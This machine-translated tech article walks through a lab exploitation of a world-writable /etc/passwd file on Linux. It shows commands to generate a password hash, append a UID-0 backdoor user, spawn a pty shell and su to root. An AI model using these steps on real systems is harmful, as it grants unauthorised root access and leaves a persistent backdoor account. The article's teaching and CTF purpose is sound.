Shulou(Shulou.com)06/02 Report--

This article is about how to enhance the rights of Linux through writable etcpasswd files, the editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article. Let's take a look at it.

In a Windows environment, administrators or members of the administrators group have higher privileges, and these highly privileged users are the primary targets of attackers. Similarly, users with root or sudo privileges in a Linux environment will be primarily targeted by attackers.

We will discuss examples of privilege escalation caused by misconfiguration of files. Usually, during the CTF challenge, we always want to look at the passwd file to see who is available on the system.

The passwd file exists in the / etc directory of Linux root. Most importantly, the file can also be accessed by non-privileged users.

/ etc/passwd

Each user in the Linux system has a corresponding record line in the / etc/passwd file, which records some basic attributes of the user. This file is readable to all users. It is a colon-separated file that, in order, contains the following information:

User name

Encrypted password

User ID (or UID)

Group ID (or GUID)

User's full name

User home directory

Log in to Shell

Now, we will look at the / etc/passwd file:

Let's take a closer look at the "/ etc/passwd" file, here we take the root user as an example:

Root: user name.

X: place the user password. The password is obtained directly from the "/ etc/shadow" file.

0:root user UID.

0:root user GID.

Root: the placeholder described by the user.

/ root: the user's home directory. The directory is displayed to the user in a terminal session.

/ bin/bash: the user's shell. Depending on the user's purpose, this shell will be generated when the user logs in.

Environment settin

The two Linux systems in VM are configured as follows and use the NAT network mode (used to share the IP address of the host).

OS NameRoleOS VersionMachine IPKernel VersionKali Linux (x64 bit) attacker machine Kali192.168.245.1344.12.0-kali2-686Ubuntu (x64 bit) vulnerable machine Ubuntu 14.04.6 LTS192.168.245.1464.4.0-142-generic

We assume that the hacknpentest user rights of the target system have been obtained on the attacker's machine (kali). Now, we will upload the linuxprivchecker.py python script to view possible misconfigurations on the target system.

We use wget (or web get) to download the file to the target server.

By default, Python is installed on all linux machines. We will run the enumeration script using the following command.

Python linuxprivchecker.py

Taking a closer look at the script output, we find that the passwd file is a writable world file with read, write and modify permissions for ordinary users.

The misconfiguration of permissions may be abused in some way to elevate the current user rights to root users. Now we will try to write to the passwd file to make us root users.

We will add a user to the passwd file and explicitly give the encrypted password in the corresponding field. You can use Perl to generate an encrypted password with salt, as follows:

$perl-le 'print crypt ("THIS_IS_Original_PASSWORD", "SALT")'

The following command adds a user with an encrypted password and UID,GID set to root [0] to the passwd file.

Echo "Tom:Encrypted_Password:0:0:User_like_root:/root:/bin/bash" & ampgt;> / etc/passwd

Let's disassemble the fields we want to add to the passwd file.

Tom: user name

Ad7t5uIalqMws: encrypt user password

0:root user ID

0:root group ID

User_like_root: user description

/ root: user's home directory

/ bin/bash: user's Shell

The'> > 'symbol redirects the output to a file, with an emphasis on the directed output at the end (in this case, the / etc/passwd file).

Generate an encrypted password:

Perl-le 'print crypt ("Password@973", "addedsalt")'

The above command generates a hash with the following password and salt:

Original password: Password@973

Salt: addedsalt

Encrypted password: ad7t5uIalqMws

Using the encrypted password above, we now append the following to the / etc/passwd file.

Echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" & ampgt;> / etc/passwd

The Tom user has been successfully attached to the / etc/passwd file.

Cat / etc/passwd

Now, using the su command, we will try to log in using the Tom user.

The prompt here must be run on the terminal, but we don't have any suitable terminals. We will migrate to bash shell using the following python one liner (python is already installed on the target server):

Python-c 'import pty; pty.spawn ("/ bin/bash")'

Now, let's try to log in to the Tom user using the following command:

Su-Tom

great! You can see that our user rights have been upgraded to root!

Summary

We found an error in the permissions configuration in the passwd file, and finally took advantage of this to upgrade our user rights to root. In the next article, we will discuss other ways to elevate Linux privileges.

The above is how to achieve Linux rights through writable etcpasswd files. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.